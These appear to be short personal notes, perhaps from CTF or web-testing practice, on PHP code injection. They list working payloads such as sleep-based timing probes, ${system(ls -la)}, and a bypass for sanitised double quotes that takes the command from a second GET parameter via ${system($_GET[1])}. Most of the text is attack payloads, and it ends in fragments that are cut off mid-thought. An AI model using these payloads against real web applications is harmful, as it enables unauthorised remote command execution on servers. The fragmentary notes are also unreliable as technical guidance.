PHP code injection
remember is “code” injection
look for the same or close payloads looks like burp scan report and change values
1){${sleep(hexdec(dechex(20)))}} burp
2){${sleep(10)}}
3){${system(ls -la)}}
easy ;)
again read php codes system,exec,….
sometimes like sql use ‘ or ”
google everything
However, remember that double quotes are being sanitized? Therefore, we can use another way by reading the value from a variable which in this case is reading input from another GET parameter. Since $_GET is a dictionary, the key can be a number. So we can set the 2nd parameter to be 1=ls or 0=ls, etc, and read it using $_GET[1] or $_GET[0] respectively.
GET parameter is give use html form :)
/?format=${system($_GET[1])}&1=ls
Therefore, our exploit URL should be (+ means <space> in URL encoding):
if is filtred
The file in the / directory